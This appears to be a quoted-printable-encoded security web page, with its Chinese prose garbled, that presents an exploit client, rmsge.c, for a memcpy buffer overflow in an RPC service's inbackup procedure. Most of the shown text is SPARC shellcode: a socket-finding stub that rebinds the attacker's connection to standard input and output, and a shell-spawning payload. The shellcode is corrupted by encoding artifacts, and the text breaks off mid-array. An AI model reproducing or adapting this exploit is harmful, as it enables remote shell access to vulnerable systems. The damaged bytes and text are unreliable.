Client=CA=C7=C8=E7=BA=CE=BB=A5=B6=AF=B5=C4=A3=AC=D6=AA=B5=C0=C1=CBRPC=20
=
Procedure=D4=DAinbackup=BA=AF=CA=FD=D6=D0=D3=D0=D2=BB=B8=F6memcpy=B5=C4Vu=
lnerability=A3=AC=C4=C7=C3=B4=D4=D9=B8=F9=BE=DD=C7=B0=C3=E6=BD=E9=C9=DC=B5=
=C4=BB=BA=B3=E5=C7=F8=D4=DA=B6=D1=D5=BB=C4=DA=B4=E6=B7=D6=C5=E4=B5=C4=C7=E9=
=BF=F6=A3=AC=CE=D2=C3=C7=BE=CD=BF=C9=D2=D4=B9=B9=D6=FE=CE=D2=C3=C7=BD=F8=B9=
=A5=B5=C4=CE=E4=C6=F7=C1=CB=A1=A3=CF=C2=C3=E6=B5=C4Exploit=20
=
Client----rmsge.c=CA=C7=B8=F9=BE=DDwww.lsd-pl.net=CD=F8=D5=BE=C9=CF=C0=E0=
=CB=C6=B5=C4Exploit=20
=
Client=B3=CC=D0=F2=D0=DE=B8=C4=B6=F8=B3=C9=A3=BA
<=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3Drmsge.c=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D>
#include=20
"msg.h"
#include <stdio.h>
#include=20
<stdlib.h>
#include <errno.h>
#include=20
<sys/types.h>
#include =
<sys/socket.h>
#include=20
<sys/time.h>
#include =
<netinet/in.h>
#include=20
<rpc/rpc.h>
#include <netdb.h>
#include=20
<unistd.h>
/*
The following code=20
findsckcode[]:
1. search through opened socket/file =
descriptor=20
2. use getPeername to get the its peer's port.
3. =
match the=20
peer's port with Exploit client port
4. Duplicate the =
matched=20
file descriptor as standard =
in/out/err
*/
char=20
=
findsckcode[]=3D /*from=20
=
www.lsd-pl.net*/
"\x20\xbf\xff\xff" =
; =20
/*=20
=
bn,a <findsckcode-4> =
*/
"\x20\xbf\xff\xff"&=
nbsp; =20
/*=20
=
bn,a <findsckcode> &n=
bsp; */
"\x7f\xff=
\xff\xff" =20
/*=20
=
call <findsckcode+4> =
*/
"\x33\x02\x12\x34"&=
nbsp;
&nbs=
p;"\xa0\x10\x20\xff" =20
/* mov =20
=
0xff,%l0 =
; =20
=
*/
"\xa2\x10
'5cx20\x54" &=
nbsp;=20
/* mov =20
=
0x54,%l1 =
; =20
=
*/
"\xa4\x03\xff\xd0" =
/* add =20
=
%o7,-48,%l2 &n=
bsp; */
"\xaa\x03\xe0\x28" &nb=
sp; =20
/* add =20
=
%o7,40,%l5 &nb=
sp; =20
=
*/
"\x81\xc5\x60\x08" =
/* jmp =20
=
%l5+8 &n=
bsp; */
"\x=
c0\x2b\xe0\x04" =20
/* stb =20
=
%g0,[%o7+4] &n=
bsp; */
"\xe6\x03
'5cxff\xd0" &nb=
sp; =20
/*=20
=
ld [%o7-48],%l3 =
; =20
=
*/
"\xe8\x03\xe0\x04" =
/*=20
=
ld [%o7+4],%l4 =
*/
&=
nbsp;"\xa8\xa4\xc0\x14" =20
/* subcc =20
=
%l3,%l4,%l4 &n=
bsp; */
"\x02\xbf\xff\xfb" &nb=
sp; =20
/*=20
=
bz <findsckcode+32> &=
nbsp; =20
=
*/
"\xaa\x03\xe0\x5c" =
/* add =20
=
%o7,92,%l5 &nb=
sp; =20
=
*/
"\xe2\x23
'5cxff\xc4" &=
nbsp;=20
/*=20
=
st %l1,[%o7-60] =
; =20
=
*/
"\xe2\x23\xff\xc8" =
/*=20
=
st %l1,[%o7-56] =
; =20
=
*/
"\xe4\x23\xff\xcc" =
/*=20
=
st %l2,[%o7-52] =
; =20
=
*/
"\x90\x04\x20\x01" =
/* add =20
=
%l0,1,%o0 &nbs=
p; */
"\xa7\x2c\x60\x08" =
; =20
/* sll =20
=
%l1,8,%l3 &nbs=
p; */
"\x92\x14
'5cxe0\x91=
" =20
/*=20
=
or %l3,0x91,%o1 =
; =20
=
*/
"\x94\x03\xff\xc4" =
/* add =20
=
%o7,-60,%o2 &n=
bsp; */
"\x82\x10\x20\x36" &nb=
sp; =20
/* mov =20
=
0x36,%g1 =
; =20
=
*/
"\x91\xd0\x20\x08" =
/*=20
=
ta 8 &nbs=
p; =
; */
"\x1a\xbf\xff\xf1"=
=20
/* bcc =20
<findsckcode+36> =20
=
*/
"\xa0\xa4
'5cx20\x01" &=
nbsp;=20
/* deccc =20
=
%l0 &nbs=
p; */
=
; "\x12\xbf\xff\xf5" =20
/* bne =20
<findsckcode+60> =20
=
*/
"\xa6\x10\x20\x03" =
/* mov =20
=
0x03,%l3 =
; =20
=
*/
"\x90\x04\x20\x02" =
/* add =20
=
%l0,2,%o0 &nbs=
p; */
"\x92\x10\x20\x09" =
; =20
/* mov =20
=
0x09,%o1 =
; =20
=
*/
"\x94\x04
'5cxff\xff" &=
nbsp;=20
/* add =20
=
%l3,-1,%o2 &nb=
sp; =20
=
*/
"\x82\x10\x20\x3e" =
/* mov =20
=
0x3e,%g1 =
; =20
=
*/
"\xa6\x84\xff\xff" =
/* addcc =20
=
%l3,-1,%l3 &nb=
sp; =20
=
*/
"\x12\xbf\xff\xfb" =
/* bne =20
=
<findsckcode+112> */
&n=
bsp; "\x91\xd0\x20\x08" =20
/*=20
=
ta 8 &nbs=
p; =
; */
;
/* =B2=FA=C9=FA=
=D2=BB=B8=F6SHELL */
char=20
=
shellcode[]=3D =
;=20
/*from=20
=
www.lsd-pl.net*/
"\x20\xbf\xff\xff" =
; =20
/*=20
=
bn,a <shellcode-4> &n=
bsp; */
"\x20\xbf=
'5cxff\xff" =20
/*=20
=
bn,a <shellcode> &nbs=
p; */
=
;"\x7f\xff\xff\xff" =20
/*=20
=
call <shellcode+4> &n=
bsp; */
"\x90\x03=
\xe0\x20" =20
/* add =20
=
%o7,32,%o0 &nb=
sp; =20
=
*/
"\x92\x02\x20\x10" =
/* add =20
=
%o0,16,%o1 &nb=
sp; =20
=
*/
"\xc0\x22\x | |
![3DTitle=20](3D"http://www.nsfocus.net/images/js_01.gif")
![3DLeft](3D"http://www.nsfocus.net/images/js_02.gif"=20)
![3DRight](3D"http://www.nsfocus.net/images/js_03.gif"=20)